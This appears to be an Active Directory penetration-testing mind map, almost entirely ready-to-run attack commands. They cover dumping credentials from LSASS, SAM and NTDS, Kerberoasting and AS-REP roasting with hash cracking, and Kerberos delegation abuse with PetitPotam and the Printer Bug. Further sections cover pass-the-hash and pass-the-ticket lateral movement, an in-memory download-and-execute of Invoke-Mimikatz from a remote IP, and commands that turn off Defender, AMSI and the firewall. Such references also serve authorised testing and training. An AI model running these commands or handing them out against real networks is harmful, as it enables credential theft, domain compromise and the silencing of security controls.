1. Designed by : Youssef Saeed
2. @y0u553f5433d
3. Icons
   1. PowerView
   2. Noisy
   3. Mimikatz
   4. Linux
   5. Rebeus
4. Dumping Credentials
   1. Tools
      1. mimikatz
         1. mimikatz.exe
         2. Invoke-Mimikatz.ps1
         3. SharpKatz.exe
         4. pypykatz.exe
   2. Creds in memory (LSASS)
      1. MimiKatz
         1. Invoke-Mimikatz -Command '"sekurlsa::ekeys"'
      2. CrackMapExec
         1. crackmapexec smb <IP> -u <USER> -p <PASS> --lsa
      3. procdump
         1. 1- Get-Process -Name LSASS 2- .\procdump.exe -ma <ProcNum> lsass.dmp
      4. lsassy
         1. lsassy -u <USER> -H <NTLM> -d <domain.full> <IP> --users
   3. Local Creds (SAM)
      1. MimiKatz
         1. Invoke-Mimikatz -Command '"lsadump::sam"'
      2. CrackMapExec
         1. crackmapexec smb <IP> -u <USER> -p <PASS> --sam
      3. SecretDump
         1. 1- reg save HKLM\sam sam 2- reg save HKLM\system system 3- reg save HKLM\security security
         2. 4- impacket-secretsdump -sam sam -security security -system system LOCAL
   4. Domain Creds (ntds)
      1. MimiKatz
         1. Invoke-Mimikatz -Command '"lsadump::dcsync /domain:<domain.full> /all"'
      2. CrackMapExec
         1. crackmapexec smb <IP> -u <USER> -p <PASS> --ntds
      3. SecretDump
         1. impacket-secretsdump <domain>/<USER>:<PASS>@<IP>
5. Lateral Movement
   1. Kerberoasting
      1. Found SPN
         1. Extract Hashes
            1. specific account
            2. Rubeus.exe kerberoast /user:<user> /rc4opsec /outfile:hashes.txt
            3. Request-SPNTicket -SPN "<SPN>" -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
            4. impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -request-user <USER> -outputfile hashes.txt
            5. all accounts
            6. Invoke-Kerberoast.ps1
            7. Invoke-Kerberoast -OutputFormat <Hashcat:John> | % { $_.Hash } > hashes.txt
            8. Get-DomainUser -SPN | Get-DomainSPNTicket -OutputFormat <Hashcat:John> > hashes.txt
            9. Rubeus.exe kerberoast /rc4opsec /outfile:hashes.txt
            10. crackmapexec ldap DC-IP -u <USER> -p <PASS> --kerberoasting hashes.txt
            11. impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD> -outputfile hashes.txt
            12. From memory to disk
            13. kerberos::list /export
         2. Cracking Hashes
            1. John
            2. john --wordlist=<wordlist path> hashes.txt
            3. Hashcat
            4. hashcat -m 13100 --force -a 0 hashes.txt <wordlist path>
         3. Remove PortNumber From hashes if found before cracking
      2. Set SPN
         1. Set-DomainObject -Identity <USER> -Set @{serviceprincipalname='Service/Name'}
   2. ASREPRoast
      1. Dumping Hashes
         1. specific account
            1. ASREPRoast.ps1
            2. Get-ASREPHash -UserName <USER> -Verbose
         2. all accounts
            1. Rubeus.exe asreproast /format:<hashcat:john> /outfile:hashes.txt
            2. crackmapexec ldap DC-IP -u <USER> -p <PASS> --asreproast hashes.txt
            3. GetNPUsers
            4. with Creds
            5. impacket-GetNPUsers -request -dc-ip <IP> <Full.Domain>/<USER>:<PASSWORD> -format <hashcat:john> -outputfile hashes.txt
            6. with users
            7. impacket-GetNPUsers -request -dc-ip IP -usersfile users .txt <Full.Domain>/ -format <hashcat:john> -outputfile hashes.txt
      2. Cracking Hashes
         1. John
            1. john --wordlist=<wordlist path> hashes.txt
         2. Hashcat
            1. hashcat -m 18200 --force -a 0 hashes.txt <wordlist path>
   3. Kerberos Delegation
      1. Unconstrained Delegation
         1. Basic
            1. Dumping Tickets
            2. Invoke-Mimikatz –Command '"sekurlsa::tickets /export"'
            3. Using Tickets
            4. Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
         2. Using Exploits
            1. Setup Ticket monitoring
            2. Rubeus.exe monitor /interval:5 /nowrap
            3. Running Exploit
            4. Printer Bug
            5. .\MS-RPRN.exe \\dc.domain.com \\VulnMachine.domain.com
            6. PetitPotam
            7. .\PetitPotam.exe <VulnPC> <DC>
            8. Using Tickets
            9. Rubeus.exe ptt /tikcet:<base64 Ticket from monitoring>
      2. Constrained Delegation
         1. Have User's hash
            1. Using Mimi and Kekeo
            2. Request TGT
            3. kekeo# tgt::ask /user:<User> /domain:<Full.Domain.com> /rc4:<Hash>
            4. Request TGS
            5. kekeo# tgs::s4u /tgt:<TGT-File>.kirbi /user:Administrator@Domain.com /service:<cifs>/<PC.Domain.com>
            6. inject the ticket
            7. Invoke-Mimikatz -Command '"kerberos::ptt <Ticket>.kirbi"'
            8. Using Rubeus
            9. Rubeus.exe s4u /user:websvc /aes256:<User's AES> /impersonateuser:Administrator /msdsspn:service/pc.domain.com /ptt
         2. Have Computer's hash
            1. Using Mimi and Kekeo
            2. Request TGT
            3. kekeo# tgt::ask /user:<User> /domain:<Full.Domain.com> /rc4:<Hash>
            4. Request TGS
            5. kekeo# tgs::s4u /tgt:<TGT-File>.kirbi /user:Administrator@Domain.com /service:<cifs/PC.Domain.com
            6. inject the ticket
            7. Invoke-Mimikatz -Command '"kerberos::ptt <Ticket>.kirbi"'
            8. Using Rubeus
            9. Rubeus.exe s4u /user:websvc /aes256:<User's AES> /impersonateuser:Administrator /msdsspn:service/PC.domain.com /ptt
      3. Resource Based
         1. Set-ADComputer -Identity dcorp-mgmt -PrincipalsAllowedToDelegateToAccount <YourPWNedHost$>
         2. Rubeus.exe s4u /user:<Pwned PC>$ /aes256:<PC$ aes256> /msdsspn:<SVC>/<SVCMachine> /impersonateuser:administrator /ptt
6. Enumration
   1. BloodHound Enum
      1. BloodHound
         1. SharpHound.ps1
            1. Invoke-BloodHound -CollectionMethod All
            2. Invoke-BloodHound -CollectionMethod All -ExcludeDC
   2. PowerView Enum
   3. Advanced Domain Enumeration
      1. Local Admin Access
         1. Find-LocalAdminAccess –Verbose
         2. Find-WMILocalAdminAccess.ps1
         3. Find-PSRemotingLocalAdminAccess.ps1
      2. Password Hardening
         1. $FormatEnumerationLimit=-1;Get-DomainUser -LDAPFilter '(userPassword=*)' -Properties samaccountname,memberof,userPassword | % {Add-Member -InputObject $_ NoteProperty 'Password' "$([System.Text.Encoding]::ASCII.GetString($_.userPassword))" -PassThru} | fl
      3. Kerberoasting
         1. Find SPNs
            1. Get-DomainUser -SPN | select samaccountname,serviceprincipalname
            2. impacket-GetUserSPNs -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>
            3. Rubeus.exe kerberoast /stats
         2. Set SPNs
            1. Making sure user have no SPN
            2. Get-DomainUser -Identity <USER> | select serviceprincipalname
            3. Found ?
         3. Found ?
      4. ASREPRoast
         1. Get-DomainUser -PreauthNotRequired -Verbose
         2. impacket-GetNPUsers -request -dc-ip IP <Full.Domain>/<USER>:<PASSWORD>
         3. ASREPRoast.ps1
            1. Invoke-ASREPRoast -Verbose
      5. Kerberos Delegation
         1. Unconstrained
            1. Get-DomainComputer -Unconstrained | select name,logoncount,descreption,operatingsystem
            2. Found ?
         2. Constrained
            1. Users Enum
            2. Get-DomainUser –TrustedToAuth | select samaccountname,logoncount,msds-allowedtodelegateto | fl
            3. Computers Enum
            4. Get-DomainComputer –TrustedToAuth | select name,logoncount,descreption,operatingsystem,msds-allowedtodelegateto | fl
         3. Resource Based
            1. Find-InterestingDomainACL | ?{$_.identityreferencename -match '<USER>'}
            2. Found ?
         4. Found ?
      6. Found ?
      7. Found ?
   4. Important
7. Require DA Privs
8. Accessing
   1. Have Legal Access ?
      1. winrs
         1. winrs -r:<HOSTNAME> cmd
      2. PsExec
         1. .\PsExec.exe \\<HOSTNAME> cmd
      3. PS-Script
         1. 1- $sess = New-PSSession -ComputerName <HOST> 2- Enter-PSSession -Session $sess
         2. Interactive
      4. Script Block
         1. 1- $sess = New-PSSession -ComputerName <HOST> 2- Invoke-Command -Session $Sess -ScriptBlock {ipconfig;whoami;pwd}
      5. WSManWinRM
         1. Invoke-WSManWinRM -hostname <HOST> -command cmd
   2. Have Password ?
      1. winrs -r:<HOST> -u:<Domain>/<USER> -p:<PASS> cmd
      2. .\PsExec.exe -u <Domain>/<USER> -p <PASS> \\<HOSTNAME> cmd
      3. impacket-psexec <<Domain>/<USER>:<PASS>@<IP>>
      4. WSManWinRM
         1. Invoke-WSManWinRM -hostname <HOST> -command cmd -user <Domain>\<USER> -password <PASS>
      5. evil-winrm -i <IP> -u <Domain>/<USER>' -p <PASS>
      6. RDP Access
         1. rdesktop -a 16 <IP> -u <DOMAIN\USER> -p <PASS>
         2. xfreerdp /v:IP /u:"<USER>" /p:<PASS>
   3. Pass The Hash (PTH)
      1. Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<> /ntlm:<NTLM> /run:powershell.exe"'
      2. impacket-psexec -hashes ":<NTLM>" <USER>@<IP>
      3. evil-winrm -u <username> -H <Hash> -i <IP>
      4. pth-winexe -U <Domain>/<User>%<NT:LM> //<IP> cmd
      5. Impacket For Win
         1. .\psexec_windows.exe -hashes ":<NTLM>" <USER>@<IP>
      6. Invoke-TheHash
         1. Invoke-SMBExec -Target <PC.Full.Domain> -Domain <Full.Doamin> -Username <> -Hash <NTLM> -Command '<Inj SHELL>' -verbose
      7. Require RDP
   4. OverPass The Hash (OPTH) OR Pass The Key (PTK)
      1. Rubeus.exe asktgt /user:<USER> /rc4:<NTLM> /ptt
         1. .\PsExec.exe -accepteula \\<HOST> cmd
         2. winrs -r:<HOST> cmd
      2. Invoke-Mimikatz -Command '"sekurlsa::pth /user:<USER> /domain:<Full.Domain> /aes256:<aes256key> /run:cmd.exe"'
      3. 1- impacket-getTGT <domain.full>/<USER> -hashes ":<NTLM>" 2- export KRB5CCNAME=$(pwd)/<USER>.ccache 3- impacket-psexec <domain.full>/<USER>@<IP> -k -no-pass
   5. Pass The Ticket (PTT)
      1. Invoke-Mimikatz -Command '"kerberos::ptt <C:\Path\To\Ticket>"'
      2. Rubeus.exe ptt /tikcet:<base64 Ticket>
      3. Access
         1. .\PsExec.exe -accepteula \\<HOST> cmd
         2. winrs -r:<HOST> cmd
9. Gained Access
   1. Have Reverse Shell?
      1. Enable PS-Remoting
         1. Powershell -ep bypass Enable-PSRemoting -force
      2. Enable RDP
         1. reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
   2. Security Bypass
      1. PowerShell
         1. Current Language Mode
            1. $ExecutionContext.SessionState.LanguageMode
         2. Execution Policy Bypass
            1. powershell –ExecutionPolicy bypass
            2. powershell –c <cmd>
            3. powershell –encodedcommand $env:PSExecutionPolicyPreference="bypass"
            4. Bypassed ?
      2. AMSI
         1. AMSI Bypass PowerShell Command
         2. Invisi-Shell
            1. If Administrator Access
            2. RunWithPathAsAdmin.bat
            3. If Not Administrator Access
            4. RunWithRegistryNonAdmin.bat
   3. Importing your modules
      1. Import Local file
         1. Import-Module .\PowerView.ps1
         2. . .\PowerUp.ps1
      2. Import in memory
         1. powershell.exe -nop -exec bypass "IEX (New-Object Net.WebClient).DownloadString('http://IP/Invoke-Mimikatz.ps1')"
   4. Stop Securties
      1. Defender
         1. 1- Set-MpPreference -DisableRealtimeMonitoring $true; Get-MpComputerStatus 2- Set-MpPreference -DisableIOAVProtection $true
         2. Disable AMSI
            1. Set-MpPreference -DisableScriptScanning 1
      2. Firewall
         1. 1- netsh firewall set opmode disable 2- netsh Advfirewall set allprofiles state off